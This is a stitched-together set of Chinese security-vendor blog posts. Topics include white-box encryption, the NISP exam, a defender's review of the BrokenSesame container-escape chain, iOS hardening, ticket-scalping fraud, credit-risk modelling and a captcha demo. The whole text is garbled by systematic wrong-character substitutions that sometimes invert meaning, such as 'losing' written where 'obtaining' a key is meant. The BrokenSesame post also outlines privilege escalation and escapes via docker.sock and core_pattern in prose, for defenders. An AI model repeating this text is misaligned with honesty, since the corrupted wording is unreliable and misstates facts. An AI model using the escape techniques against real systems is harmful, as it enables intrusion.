最大隐患是对密钥的爱护：任何人只有失去密钥，就能解密任何密文开发者在app中应用各种伎俩来暗藏密钥，但都无奈保障平安如果对密钥进行加密，又将引入一把新的密钥白盒加密 1.Lookup table转换： 将密钥打散，转化为大量的Lookup table，融入算法之中，从原理上杜绝密钥泄露的危险 2.Lookup table随机化： 对Lookup table进行随机化、非线性化爱护 3.利用虚拟机爱护技术： 将算法置于顶象专利的虚机环境中进行爱护，运行时与外界非可信环境隔离 4.高强度攻防反抗： 采纳多种技术避免对白盒的非法调用、注入、调试、内存批改等攻打 5.加密数据与设施绑定： 实现一机一密的超高安全性，无奈脱机解密 以上就是目前软件平安爱护的最根底的组合拳，仅供大家参考学习~ 如须要残缺的解决方案，能够返回理解：顶象端平安解决方案

自从人类社会进入工业革命后，生产力产生了微小的变动，而随着一次次工业革命的开展，咱们的生存变得愈发便当，当初的第四次工业革命，将咱们带入了智能化时代，然而因为网络世界，很多人的信息都被展现在网上，信息安全成了很大的问题。 因而，和信息安全相干的岗位，成为了热门岗位，而且与其相干的证书也是很多人会考的，上面大使简略介绍一下，有须要的人能够在认证大使上具体理解。 NISP认证概述 国家信息安全程度考试（NISP）是中国信息安全测评核心考试、发证，由国家网络空间平安人才培养基地经营治理，并受权网安世纪科技有限公司为NISP证书管理中心。 中国信息安全测评核心发展国家信息安全程度考试(NISP)考试我的项目，是为遍及信息安全/网络安全常识，造就我国网络空间平安专业人才的“预备役”，对于增强我国的网络空间平安人才队伍建设，进步我国在网络空间的平安保障与反抗能力具备重要的战略意义。 NISP考试事项 报考条件：高职、大专、本科及以上学历全日制在校学生 学习形式：线上直播课/录播课程，60课时 考试形式：就近城市安顿线下考试 考试分数：总分100分，70分及格 考试时长：120分钟

2023年4月19日，Wiz Research 在文章 Accidental ‘write’ permissions to private registry allowed potential RCE to Alibaba Cloud Database Services 中披露了被命名为BrokenSesame的一系列阿里云数据库服务破绽，向咱们展现了如何从一个容器逃逸破绽，与公有仓库写权限的组合，最终实现RCE的攻打链路。该破绽最终可导致未受权拜访阿里云客户的PostgreSQL数据库，并且能够通过在阿里巴巴的数据库服务执行供应链攻打。 时隔一个月，在通过钻研与复现的过程中，不由得感叹攻击者的构思奇妙；而反过来作为防守人员，咱们是否在这次战斗中，取得一些教训和启发？让咱们站在蓝军的视角再看一遍残缺的攻打途程。 0x01 容器提权在原文中，作者分享了两个案例：ApsaraDB RDS for PostgreSQL 和 AnalyticDB for PostgreSQL。 两个案例的第一步均为容器提权：从一般账户提权至更高的权限。 在这一步中，两个案例别离用到了不同的攻打链路： cron定时工作'/usr/bin/tsar' -> 高权限执行的二进制文件 -> 可批改的动态链接库 -> 笼罩链接库 -> 定时工作登程执行获取root权限。容器共享目录 -> 业务个性导致任意文件读取（符号链接）-> 获取到另一个容器的读取下权限。在这两个链路中，链路1实际上是在浸透过程中最常应用的一种攻击方式，通过注入歹意动态链接库实现账户提权。这条链路波及到了两个要害的问题点：cron定时工作的启动权限和动态链接库权限。cron的高权限导致所有定时工作都通过高权限账户root来执行，而可批改的动态链接库权限导致笼罩动态链接库； 针对这两个危险点，传统的HIDS文件监控即可笼罩到该层面。除此之外，对于增加进入定时工作的二进制程序，应该严格限度其权限，包含动态链接库文件。 在第二条链路中，咱们发现实际上业务在设计架构模式上时，应用了共享容器的目录来实现通信；但业务代码并没有思考符号链接的场景，导致了第二个文件下的任意文件读取。 整体来看，链路1和链路2别离属于的HIDS主机监控/黑白盒业务平安扫描的领域，阐明即便在云场景下，传统的业务平安仍旧处于重要位置。 0x02 容器逃逸获取到容器root权限后，下一步便是朝着宿主机进行攻打，同样是两条链路： 共享pid namespcae -> 监听发现共享的挂载目录'/home/adbpgadmin' -> 植入ssh/config获取容器B权限 -> 通过容器B的docker.sock 逃逸至宿主机。由提权过程中的任意文件读取获取到业务代码 -> 代码审计发现命令注入 -> 通过命令注入获取到特权容器的shell -> 通过core_pattern实现容器逃逸。在这两条链路中，攻击者应用了两种不同的逃逸形式：共享namespace导致攻击者获取到更多信息、挂载docker.sock导致逃逸、特权容器复写core_pattern导致逃逸；这几种形式是云环境中比拟经典的逃逸场景，使得容器绕过各种隔离限度，对容器外的宿主机或其余容器的资源进行操作。 如何对容器逃逸进行进攻？传统的业务平安和主机平安并没有针对主机cgroups和namespace的进攻设计；联合云原生的架构模式，能够在两个环节建设容器逃逸检测。 DevSecOps平安左移，对代码仓库构建产物的IaC(基础设施即代码)进行审查，在开发阶段对可能存在逃逸危险的配置项问题进行阻断，防止出现各类逃逸问题。 运行时监测, 对于曾经上线并理论运行的业务容器，实时监控逃逸特色。通过订阅内核事件，抓取可能为逃逸的行为特色，联合以后运行中的容器配置信息进行剖析，综合给出是否存在逃逸危险以及是否产生逃逸事件的告警。 联合这两点，能够做到对逃逸危险的无效管制，避免攻击者进一步的攻击行为。 ...

之前有写过【如何给iOS APP加固】，然而通过一段时间的思考，我找到了更具备实践性的代码，具体能够看上面。 技术简介iOS加固爱护是基于虚机源码爱护技术，针对iOS平台推出的下一代加固产品。能够对iOS APP中的可执行文件进行深度混同、加固，并应用独创的虚拟机技术对代码进行加密爱护，应用任何工具都无奈间接进行逆向、破解。对APP进行完整性爱护，避免应用程序中的代码及资源文件被歹意篡改。 技术性能目前iOS加固次要蕴含逻辑混同、字符串加密、代码虚拟化、防调试、防篡改以及完整性爱护这三大类性能。通过对上面的代码片段进行爱护来展现各个性能的成果： - (void) test { if (_flag) { test_string(@"Hello, World!",@"你好，世界！","Hello, World!"); } else { dispatch_async(dispatch_get_mian_queue(), ^{ do_something( ); }); } int i=0; while (i++ < 100) { sleep(1); do_something( ); }}将代码编译后拖入IDA Pro中进行剖析，能够失去这样的控制流图，只有6个代码块，且跳转逻辑简略，能够很容易地判断出if-else以及while的特色： 将其反编译为伪代码，代码逻辑及源代码中应用的字符串均清晰可见，与源代码构造基本一致，成果如下 void __cdecl -[ViewController test](ViewController *self, SEL a2){ signed int v2; // w19 __int64 v3; //x0 if ( self->_flag ) sub_100006534 ( CFSTR("Hello, World!"),CFSTR("你好，世界！"), "Hello, World!" ); else dispatch_async ( &_dispatch_main_q, &off_10000C308 ); v2 = 100; do { v3 = sleep( 1u ); sub_100006584( v3 ); --v2; } while ( v2 );}1 代码逻辑混同通过将原始代码的控制流进行切分、打乱、暗藏，或在函数中插入花指令来实现对代码的混同，使代码逻辑复杂化但不影响原始代码逻辑。 ...

近日，第八届亚太银行数字化翻新博览会（2023 BDIE）在上海举办。来自银行、机构、科技厂商的专家与学者，聚焦翻新技术利用，独特探讨银行数字化转型倒退的破局点。顶象现场展现了顶象进攻云及金融反欺诈案例。 作为国内当先的业务平安公司，顶象已为中国银行、交通银行、安全银行、江苏银行等100多家金融机构提供服务。自主研发了一站式业务平安感知进攻云、Dinsight实时风控引擎和Xintell智能模型平台，通过积攒的丰盛实战经验，积淀了数万条业务策略和数百个场景化利用计划，可能为企业构建笼罩事先、事中、预先全生命周期的平安体系，提供情报、感知、剖析、策略、防护、处理等服务。 顶象进攻星散成业务感知进攻平台、验证码、设施指纹和端加固产品，以及业务平安情报、云策略等服务，领有丰盛的技术工具、数万个安全策略及数百个业务场景解决方案，具备情报、感知、剖析、策略、防护、处理的能力，提供模块化配置和弹性扩容，助企业疾速、高效、低成本构建自主可控的业务平安体系。 顶象Dinsight实时风控引擎能够在营销流动、领取下单、信贷申请等场景，对业务前端发送的申请进行危险判断，并于毫秒内返回决策后果，以晋升业务系统对危险的防控能力。日常风控策略的均匀处理速度仅需20毫秒，聚合数据引擎，集成专家策略，反对对现有风控流程的并行监测、替换降级，也可为新业务构建专用风控平台；聚合反欺诈与风控数据，反对多方数据的配置化接入与积淀，可能进行图形化配置，并疾速利用于简单策略与模型；可能基于成熟指标、策略、模型的教训储备，以及深度学习技术，实现风控自我性能监控与自迭代的机制；集成专家策略，基于零碎+数据接入+指标库+策略体系+专家施行的实战；反对对现有风控流程的并行监测、替换降级，也可为新业务构建专用风控平台。 基于关联网络和深度学习技术的Xintell智能模型平台，联合Hadoop生态和自研组件，将简单的数据处理、开掘、机器学习过程标准化，提供从数据处理、特色衍生、模型构建到最终模型上线的一站式建模服务，联合利落拽式操作大幅升高建模门槛，晋升建模工程师、数据科学家的工作效率，让经营人员和业务人员也能间接上手操作实际，帮忙企业通过对大数据的模型训练在反欺诈、风控、营销、客户分群等场景提供模型反对，并可能依据工夫变动进行动静降级与优化，极大升高建模和模型治理门槛。 第八届亚太银行数字化翻新峰会由亚太银行联盟组委会主办，金融数据港和中银协中西部培训机构特地反对，主题为“数据&技术双驱动促成银行高质量倒退”，旨在为银行与科技搭建一个互动分享平台。 业务平安大讲堂：立刻报名 业务平安产品：收费试用 业务平安交换群：退出畅聊

2023年“五一”假期，文化和游览行业复苏势头强劲，全国假日市场安稳有序。文化和旅游部数据中心测算，全国国内游览出游共计2.74亿人次。 据交通部门数据显示，自4月27日铁路“五一”假期运输启动以来，截至5月4日，全国铁路共发送旅客1.33亿人次，较2019年同期减少2794万人次，其中4月29日发送旅客1966.1万人次，创铁路单日旅客发送量历史新高。另据中国民航局音讯，2023年4月29日至5月3日，“五一”假期民航运输旅客941.2万人次，日均运输188.2万人次，比2022年“五一”假期日均数 31.0万人次增长508.0%。 往年“五一”假期一个印象是“人多”，无论出行购票还是游览门票都须要抢。顶象进攻云业务平安情报中心监测发现，在簇拥的抢票背地，存在大量业务危险。代抢旅游景点门票成黄牛牟利新形式，航空机票的虚伪占座仍旧异样肆虐，火车高铁的抢票软件虽有效却大行其道。 热门景区呈现黄牛“代抢”服务“五一”假期，故宫博物院、八达岭长城、泰山景区等多个热门旅游景点一票难求。因为很多景区实现了网上实名制购票，游客应用身份证或二维码即可进出进去，惯例的纸质门票不是进出的凭证，无效防止了黄牛倒票的可能，然而门票如此火爆，少量黄牛做起了“代抢”生意。 所谓“代抢”，就是黄牛利用软件帮忙游客抢订指定游览景区的门票，而后加价发售给游客。 例如，一张故宫成人门票配上电子语音解说，代抢的价格在350元至400元间，一位黄牛称是用抢票软件代订门票，成功率为85%。 “代抢”的背地是门票难抢，几万张门票几百万人同时抢，开票秒没，不靠运气，就靠手速。黄牛抢通过各种外挂程序模仿真人操作去抢票，可能进行注册登录抢购等操作，从而疾速、刹时、批量对指定商品、服务进行哄抢。同时舞弊工具集成破解性能，能破解下单协定，绕过图片验证码，主动更换IP地址，伪造设施编号等。只须要填写好账号密码，设置好运行工夫，就可能主动且重复提交购买，实现抢购只须要1秒。 一张门票，A比B早1秒钟，则A可能购买到，B则无奈购买到。在操作速度方面，人靠的是神经反馈，而程序是基于事后设置流程，因而运行速度远超过人，抢票成功率远远高于一般游客。 热门航线仍旧存在“黄牛倒票”某OTA平台数据显示，2023年“五一”期间，尽管机票价格较疫情前增长三成以上，国内热门城市机票预订量仍超过疫情前五成，成都、北京、深圳、广州、上海、重庆、昆明、西安、杭州、海口的等是热门出发地。 顶象进攻云业务平安情报中心监测数据显示，“五一”期间多家航空公司B2C网站虚伪搜寻量猛增，热门航线的虚伪航班信息搜寻查问量超过60%。虚伪查问不仅白白耗费航空公司的机票信息查询费，导致机票动静定价失真，更会导致呈现虚伪占座等倒票状况产生，间接影响机票销售和经营，给航空公司带来巨额的经济损失。 首先，减少航空公司查问开销。歹意网络爬虫非法抓取航空公司B2C网站或官网App等平台上的航班信息，节约航空公司带宽资源，更白白耗费航空查问费用。航空公司每年要向中航信缴纳航线机票查问费用，该费用是依据航班信息的查问量来计费，查问量大则费用多。 其次，影响航班机票的动静定价。虚伪的搜寻查问量会导致航空公司收益管理系统算法产生误判，给出不符合实际状况的运价调整（即机票价格）。例如，本来某航班机票售价只有400元，虚伪流量查问暴增10倍后，航空公司网站的订票零碎会计算为购票旅客暴增，从而霎时跌价至2000元，重大侵害消费者权利以及平台的口碑。 最初，倒票赚取差价，影响失常经营秩序。用歹意网络爬虫抓取下航班票务信息后，通过虚伪的身份信息预订航线机票。在航空公司容许的订票付款周期内，加价转售给真正须要购票的消费者。这就导致局部机票并未售出，但消费者在航空公司查看时却显示已售罄。这种“黄牛倒票”行为不仅侵害消费者的合法权益，更是重大扰乱航空公司的失常经营。 各平台上的“抢票软件”有多重危险某OTA平台上，“五一”假期，在线购买火车票人数创历史新高，热门线路车票售罄速度超过春运。 顶象进攻云业务平安情报中心监测发现，很多线上游览甚至外卖平台都推出了各自的火车票候补抢票业务，全能抢票、专人抢票等，有的甚至在抢票页面明确标注了“抢票成功率”的数值。 其实，早在2017年，某OTA平台推出“减速包”抢票服务时，铁路部门就屡次做出回应，中国铁路从未受权其余网站发售火车票，无论是哪款购票软件都须要在12306购票零碎排队，请抉择官网渠道购票。但仿佛并未打消乘客们对于“减速包”是否可能减速抢票的疑虑。 2022年，铁路部门再次对“抢票”问题作出回应称，消费者应用的“减速包”并不能领有优先购票权，无论是哪款购票软件都须要在铁路12306购票零碎排队。如遇所需车次、席别无票，可在线排队候补，当对应的车次、席别有退票时，零碎将主动购买车票。同时，揭示乘客您不要将个人信息提供给第三方网站和手机客户端，免得个人信息泄露带来危险。 顶象进攻云业务平安情报中心认为，“抢票软件”存在如下三类安全隐患。 第一，第三方“抢票软件”可能留存乘客信息，这可能导致泄露乘客隐衷信息，并被用于商业推广等行为。倡议乘客应用前，仔细阅读服务协定，并认真查阅2021年施行的《个人信息保护法》。 第二，12306没有受权任何第三方“抢票软件”，当乘客“抢票软件”退改签等时，可能会存在多收乘客退票、改签费用，无奈退票改签，或是列车运行信息有误等状况，带来损失或影响行程。 第三，“抢票软件”高频率查问、无限度反复抢购，会影响12306失常购票秩序、导致系统提早，为了保障用户权利，随时会被12306屏蔽，进而导致乘客无奈失常购票、白白浪费购买的“减速包”。 业务平安大讲堂：立刻报名 业务平安产品：收费试用 业务平安交换群：退出畅聊

背景近日，银保监会布了往年1季度银行业数据显示，不良率较年初回升0.24个百分点。信用卡贷款有所降落，不良率有所回升。银保监示意将会将进一步增强监管引领，继续推动银行业不良贷款处理工作，持续加大不良贷款处理力度。 对于技术人员来说，咱们能够从哪些角度来升高信贷不良率呢？周二，适宜思考技术问题！ 信贷不良率的技术因素咱们首先来看看影响信贷不良率的技术因素： 1.数据品质。 信贷决策的准确性和可靠性取决于所应用的数据品质。如果数据存在谬误、缺失、反复或不统一等问题，将会对决策后果产生负面影响。而因为很多金融机构的消费信贷业务展业工夫无限，未经验过残缺的经济周期的考验，积攒的数据维度也不够全面，用于建设现有风控策略和模型体系的历史数据覆盖面不够广、周期不够长，所以，不能精确应答突发事件的影响。 2.特色工程： 因为特色工程波及到特征选择、特色变换、特色构建等技术，能够通过无效地捕捉借款人的相干信息和行为模式来改善模型的性能。 3.模型抉择和优化： 不同的机器学习算法和模型具备不同的劣势和适用性。所以我咱们要依据数据的特点和业务需要，抉择适合的模型，并进行参数调优和模型优化，以进步模型的准确性和泛化能力。 4.危险评估模型： 危险评估模型能够通过剖析借款人的个人信息、财务状况、历史信用记录等来预测借款人的守约概率。 5.自动化决策零碎： 该零碎联合了数据分析、模型预测和决策引擎等技术，可能主动评估借款人的危险，提供疾速的决策后果，并缩小人为谬误和操作危险。 6.实时监测和预警系统： 建设实时监测和预警系统能够帮忙银行及时发现和响应潜在的信贷风险。通过实时监测借款人的还款行为、信用评分等信息，联合预设的规定和模型，能够提前预警可能的守约危险，并采取相应的措施进行危险管控。 从技术角度来优化1.数据分析和建模： 利用大数据和机器学习技术，对历史数据进行深入分析和建模，以发现潜在的危险模式和预测不良危险。通过建设危险评分模型和预测模型，能够更精确地评估借款人的信用情况和还款能力。 import pandas as pdfrom sklearn.model_selection import train_test_splitfrom sklearn.linear_model import LogisticRegressionfrom sklearn.metrics import accuracy_score# 加载数据集data = pd.read_csv('credit_data.csv')# 数据预处理，包含特征选择和数据荡涤等步骤# ...# 划分训练集和测试集X = data.drop('bad', axis=1) # 特色y = data['bad'] # 标签X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)# 创立逻辑回归模型model = LogisticRegression()# 模型训练model.fit(X_train, y_train)# 模型预测y_pred = model.predict(X_test)# 计算准确率accuracy = accuracy_score(y_test, y_pred)print("准确率：", accuracy)2.自动化危险决策： 引入自动化危险决策零碎，将规定和模型利用于实时的贷款申请审批过程中。该零碎能够依据借款人的信息和危险评估后果，主动决定是否批准贷款、贷款额度和利率等。 咱们首先应用逻辑回归模型对训练数据进行训练。而后定义一个自动化危险决策函数 risk_decision，该函数承受一个借款人的数据作为输出，应用训练好的模型预测借款人的危险评分，并依据预测后果和设定的危险阈值做出危险决策。简略的代码看上面↓↓↓ ...

4月份新能源汽车销量排行榜，比亚迪再占鳌头。 布告显示，2023年4月，比亚迪新能源汽车销量210295辆，本年累计销量762371辆，同比增长94.30%。比亚迪4月海内销售新能源乘用车共计14,827辆。比亚迪4月新能源汽车动力电池及储能电池装机总量约为9.954GWh，2023年累计装机总量约为36.945GWh。比亚迪新能源汽车持续高歌猛进，显示出良好的增长势头。 产品热销离不开正确的营销策略、优质的经销商服务和欠缺的用户服务体系。比亚迪的精诚服务是对本身服务的要求，也是对用户的承诺，对公众、社会的责任。高品质的售后服务不仅失去用户的统一投诉，同时也受到业内的认可。精，是比亚迪对技术的怠惰摸索，对车辆的服务承诺。比亚迪通过当先行业的质保政策、网点布局、备件供给、培修规范等，践行为车辆提供无忧保障的使命。诚，是比亚迪对服务的本真谋求，对用户的服务承诺。比亚迪一直晋升服务水平、优化劳动环境、摸索数字化服务、丰盛服务产品，始终保持为用户发明更好的服务体验。 高品质的售后服务离不开数字化的撑持。比亚迪突破数据孤岛，建设了一套优良的售后数字化流程，满足销售和售后业务管理的贴合度，实现业务财务的有机整合，赋能私域客户精细化经营，更把不同部门的治理后劲激发进去，真正实现高质量的客户服务。 为了增强售后服务平台的安全性和防备欺诈行为，比亚迪售后服务平台选用顶象无感验证。顶象无感验证技术能够疾速精确地区分操作者是人还是机器，精准辨认欺诈行为，及时甄别出歹意账号，防止大量机器账号的歹意攻打，实时监控并拦挡异样行为，保障登录过程的安全性。 此外，无感验证还能够进步售后服务平台的效率和便捷性。相比传统的用户名和明码登录形式，无感验证能够缩小输出环节、晋升用户体验，让用户更加不便地进行操作和查问，进步了售后服务的效率。 在数字经济迅猛崛起的当下，数字业务平安尤其重要，采取迷信无效的安全措施，加强本身的防御能力，保障业务的稳定性和安全性，升高公司的危险老本，进步经营效率，晋升客户满意度。比亚迪采纳无感验证技术优化售后服务平台的安全性和用户体验，体现出企业对用户权利的关注和承诺，也加强了消费者对比亚迪品牌的信任感和忠诚度。 业务平安大讲堂：立刻报名 业务平安产品：收费试用 业务平安交换群：退出畅聊

5秒售罄，非人哉？五月天演唱会 30 万张门票 5 秒售罄，你要说这是人在抢，我是不信的。可是售票平台为什么挡不住黄牛？ 其实次要起因可能在于当初黑灰产成熟的产业链： 1.技术手段有余： 只管售票平台采取了一些技术手段来限度黄牛，比方验证码、实名制购票等，然而黄牛往往可能利用技术手段进行破解或绕过这些限度。他们能够应用自动化软件或脚本来疾速抢购票源，或者通过代购、批量注册账号等形式绕过实名制限度。 2.信息透露： 有时候售票平台可能存在安全漏洞或信息透露，导致黄牛可能获取到尚未公开的票源信息。这样一来，黄牛能够在票源正式公开前就进行抢购，占据先机。 3.利益驱动： 黄牛为了谋取高额利润，通常违心投入大量工夫和精力去破解或绕过售票平台的限度措施。他们可能有本人的黑市渠道或独特的资源，可能获取到一些稀缺或热门的票源，而后以高价发售给购票者。 4.不足监管与法律制裁： 某些地区的法律对于黄牛行为可能不足明确的规定，或者执行力度不够弱小。这给了黄牛可乘之机，他们能够通过各种伎俩绕过法律限度，从事非法售票流动。即便一些地区存在相干法律制裁，执行难度也可能很大，导致黄牛仍可能长期存在。 技术人技术魂，如何从技术上无效防黄牛1.应用身份验证： 在须要购买限量或热门商品的状况下，能够要求用户进行身份验证。这能够包含要求提供个人身份证明文件、手机号码验证或其余无效的身份认证形式。这将帮忙限度黄牛应用多个身份进行批量购买。身份验证的代码很简略，如果用在黄牛防备的场景，可能最好加上无感验证的代码： <!DOCTYPE html><html><head> <title>无感知验证示例</title> <script src="https://cdn.dingxiang-inc.com/ctu-group/captcha-ui/index.js"></script></head><body> <form action="your_form_handler" method="POST"> <!-- 增加无感知验证 --> <div class="dx-captcha" data-app-id="YOUR_APP_ID" data-token-field="dx_captcha_token"></div> <input type="hidden" name="dx_captcha_token" id="dx_captcha_token" value=""> <button type="submit">提交</button> </form> <script> // 在表单提交前触发无感知验证 document.querySelector('form').addEventListener('submit', function(event) { event.preventDefault(); // 阻止表单默认提交行为 var captcha = new DxCaptcha({ appId: 'YOUR_APP_ID', success: function(token) { document.getElementById('dx_captcha_token').value = token; // 将 token 设置到暗藏域 document.querySelector('form').submit(); // 提交表单 } }); captcha.render(); }); </script></body></html>以上用的是顶象的无感验证demo，所以须要将 "YOUR_APP_ID" 替换为你在顶象（Dingxiang）平台上取得的应用程序 ID。此外，你还须要解决表单提交的代码，以便在验证胜利后执行相应的操作。 2.施行限购措施： 限度每个用户的购买数量能够无效地缩小黄牛的流动。你能够在购买过程中设置购买数量限度，或者要求用户提供相干信息来验证其购买资格。 ...

而随着企业数字化过程的减速，企业账号治理面临着前所未有的挑战。安全性、便捷性和管理效率成为企业管理者关注的重点。 作为公司员工，“打工人”或多或少都面临着不同零碎：开发工具、版本控制系统、文档管理系统、项目管理工具......“打工人”在疲于工作之外，大都会抉择简略且反复的明码。这让员工感到多零碎繁琐的同时，也必将给公司的平安带来肯定的隐患。 企业账号治理的挑战源于账号数量的减少、权限管制的复杂性以及外部威逼的存在。过来，员工可能只须要几个账号来拜访企业外部零碎，但随着云计算、软件即服务（SaaS）和挪动利用的衰亡，员工须要治理更多的账号和明码。这不仅减少了账号治理的累赘，也减少了账号被攻打或滥用的危险。 此外，企业还须要确保员工只能拜访他们工作职责所需的零碎和数据，以避免数据泄露和外部威逼。传统的账号治理办法难以提供足够的权限和访问控制，往往存在危险和破绽。 全新数字身份平安的利用身份平安解决方案在企业账号治理方面的利用，为企业提供了全面的身份平安爱护。让 适合的人 在 失当的工夫 采纳 正确的形式 和 惟一的身份 从 对立的入口 拜访 已受权 的信息资产。 通过微服务、零信赖、聚合式多因子认证、金字塔型权限管理模式和基于Al的行为剖析以及分布式联盟认证等性能，企业可能增强账号平安，升高平安危险，爱护敏感数据免受未经受权的拜访和滥用。身份平安解决方案不仅晋升了企业的安全性，还进步了员工的工作效率和用户体验，为企业管理者打造了一个平安、便捷和高效的账号治理环境，员工的幸福感天然也 UP UP UP ! 摸索身份平安反动 共创数字平安将来5月25日，顶象第二季第五期业务平安大讲堂行将开讲！ 本期直播将由景安云信业务平安专家张军令老师从企业账号治理登程，为大家深入浅出地解说身份平安解决方案如何助力企业数字化转型需要。 直播工夫：5月25号（周四）下午15:00 直播福利：直播间不定时会抽出顶象周边福利，直播嘉宾的福利包含但不仅限于——1、第二本业务平安专业书籍的联结署名权（首部图书）；2、现金处分；3、顶象周边。 同时，欢送各位圈内圈外大佬以及合作伙伴积极参与到咱们第二季的业务平安大讲堂直播流动中来，有动向的可增加小助手沟通参加。 本期主讲嘉宾张军令，景安云信营销中心北区销售经理，近十年信息化相干行业从业教训，次要服务于金融、能源、央国企等行业客户，在信息安全畛域有丰盛教训。 Tips：本期直播将在顶象视频号&钉钉&B站顶象直播间&CSDN顶象技术直播间多平台同步直播，感兴趣的同学记得肯定要提前锁定直播间哦！ 业务平安大讲堂：立刻报名 业务平安产品：收费试用 业务平安交换群：退出畅聊

随着文娱活动的复苏，大量黄牛“卷土袭来”。顶象进攻云业务平安情报中心发现，五月天行将开启边疆巡演，北京鸟巢演唱会、深圳演唱会陆续官宣。五月天演唱会门票等，遭逢大量黄牛。 “史上最难抢票”的五月天演唱会5月10日，五月天2023“好好好想见到你”演唱会深圳场正式官宣，且将在13日开启三场预售。为了抢到门票，粉丝们“奇招频出”。有人动用了手机、iPad、电脑等五六台设施；有人断开Wi-Fi，全程用5G抢票；有人叫上亲朋好友，十几号人齐上阵。在售票平台页面上，有超过230万人示意“想看”五月天北京演唱会。 演唱会的门票，同步在多个平台销售。开售后，将近30万张演出票简直“秒没”，而黄牛却在社群和朋友圈加价发售门票。在电商平台搜寻“五月天北京演唱会”时发现，数十家票务商家正在销售门票。这些商家大多醒目地标注着“副品保真”“100%出票”等标识。门票价格则依照座位程序从几百元到数千元不等，这些门票的黄牛价比票面高了不止一倍，黄牛倒买倒卖的行径成为人心所向。 粉丝称之为“史上最难抢票”的五月天演唱会，黄牛是如何抢到票的呢？ 黄牛为什么能抢到票顶象进攻云业务平安情报中心剖析分发现，黄牛之所以手中能握有大量演唱会门票，除了研发专门用于抢票的软件，能够在售票开启第一工夫抢到大量门票，甚至还造成较完整的抢票产业链。 抢票拼的是速度，黄牛为什么比粉丝更容易抢到？次要是因为下单速度不同。同样一件商品，A比B早1秒钟，则A可能购买到，B则无奈购买到。在下单速度方面，人靠的是神经反馈，而软件是基于事后设置流程，因而运行速度远超过人，抢购成功率远远高于一般消费者。 黄牛就是通过舞弊工具，进行批量注册登录抢购等操作，从而疾速、刹时、批量对指定商品、服务进行哄抢。同时舞弊工具集成破解性能，能破解电商下单协定，绕过图片验证码，主动更换IP地址，伪造设施编号等。只须要填写好账号密码，设置好运行工夫，就可能实现主动抢购，省时省力又省钱。 黄牛抢票带来哪些坏影响黄牛抢购门票的行为会导致门票的供求失衡，引发市场价格的不合理上涨，减少公众的票务老本。此外，黄牛的歹意抢票还会毁坏失常的购票机制和秩序，导致普通用户无奈获取门票，从而减少票务的不公平性和不透明性。 耗费平台服务器资源。为了抢购门票，黄牛注册大量账户，并同时发动抢购申请，导致服务器资源过载，进而影响失常用户的购票体验，造成DDoS攻打的成果。 泄露用户隐衷信息。黄牛为了注册账号、抢票，须要应用大量实名信息，这些信息都是通过非法手段获取，包含用户的个人信息、购票记录等。这可能导致用户信息泄露，减少平台的平安危险。 影响售票平台口碑信用。黄牛利用技术或其余伎俩在最短时间内抢购大量门票，导致失常购票用户无奈取得门票，从而造成公平竞争有余的情况。而后通过加价发售的获取更多的利益，导致消费者因为价格不合理而失去对售票平台的信赖和反对，甚至可能放弃应用该平台服务，造成口碑损失和经济损失。 无奈保障生产权利。因为黄牛以更高价格售出，不仅扰乱了市场价格，更让消费者的收入高出一大截。而且黄牛抛售的门票是非法手段取得，消费者购买后的权利无奈失去保障。一旦在票源呈现问题时，难以失去平台和官网的反对和保护，从而可能引发投诉和纠纷。 黄牛的存在不仅毁坏了市场的公平竞争，而且也影响了售票平台、消费者的利益。售票平台应该采取相应的技术和管理手段，增强对黄牛的打击和监管，保障消费者权利。 售票平台为什么挡不住黄牛？售票平台规定繁冗、破绽多。破绽是威逼的暴发源头，无论是病毒攻打还是黑客入侵大多是基于破绽，软件破绽、接口破绽、治理破绽等等。售票业务中波及到的优惠零碎、客户零碎等，规定应用上相互重叠破绽很多，业务危险点多，账户、订单等各零碎均有可能呈现破绽，单点防控难度大。 黄牛人数多、业余水平高。黄牛彼此分工明确、单干严密、协同作案，造成一条残缺的产业链。他们相熟各项业务流程，理解企业的需要、风控规定及业务破绽，可能娴熟的使用挪动互联网、云计算、人工智能等新技术进行业务欺诈操作。 欺诈伎俩复杂多变，单点防护生效。黄牛手握大量账号，同时纯熟应用秒拨IP、模拟器等业余工具不断更新，新伎俩层出不穷，平台反抗难度大。 攻打起源简单，辨认和进攻难度大。相较于个体欺诈，团伙欺诈行为更难侦测和辨认，传统的反欺诈工具无奈从全局视角洞察欺诈危险。业务危险欺诈一直变动，伎俩更迭疾速，新攻打伎俩对既有的防控措施进行了调整甚至免疫，传统措施不能及时对新危险进行辨认和预警。而且网购平台很多业务平安流程上很容易互相矛盾，甚至互相打架， 一旦呈现误判，将间接影响订单交易。 治理上如何无效防控黄牛采取实名认证机制。通过售票平台实名认证，绑定手机号、身份证等信息，验证购票者的实在身份，避免黄牛从机器人大量抢票。 施行随机购票机制。通过随机购票、订单限额等措施，防止黄牛批量刷票。 多渠道销售门票。采取线上、线下多渠道销售门票，尽量满足宽广用户的需要，而不是让黄牛占据劣势。 增强监管打击。联结监管部门增强对黄牛的打击力度，保护市场秩序，保障消费者合法权益。 进步用户意识。进步消费者的安全意识和警惕性，不要置信集体或第三方售票平台的高价门票，购票要抉择正规售票平台，并留存好购票记录。 技术上如何无效防黄牛基于黄牛的特色和业务防护策略，顶象进攻云业务平安情报中心倡议票务平台需构建一个笼罩多渠道全场景，提供多阶段防护的平安体系。该体系买通平台的前台、中台和后盾，笼罩各渠道平台和各业务场景，提供威逼感知、平安防护、数据积淀、模型建设、策略共享等平安服务，可能满足不同业务场景，领有各行业策略且可能基于本身业务特点实现积淀和更迭演进，实现平台的精准防控。 事先 1、别离从业务规定、业务逻辑、业务平安防控措施、业务平安应急预案等方面做好评估和筹备，保障业务和零碎的公平性。例如，业务零碎上短少平安组件，在上线时就须要减少平安组件的应用。提前准备应急预案，一旦发现业务有破绽或被歹意拜访，能够及时疾速进行应急预案，利用提前制订好的规定，进行防护。 2、基于业务平安情报，发现新危险新变动，帮忙企业减速对行业中新型威逼的布防速度和能力，帮忙企业提前获取黑灰产动员威逼的工具、门路、用意等信息，勾画出攻击者画像。 事中 1、建设在线热部署等布控能力。攻打来袭时，继续对账户行为进行剖析，并依据策略情报和危险数据进行实时利用和断定，一旦发现异常及时拦挡，并及时更新调整规定和策略。 2、通过业务监控，来实时察看业务进行中的数据状况，便于及时发现异常情况，进行针对性解决。 预先 1、基于每日的业务数据进行剖析，发现暗藏的异样。 2、积淀每日的危险数据，开掘攻打特色，利用每日危险数据、交易数据、安全策略，进行降级更迭，调整风控引擎和风控模型。 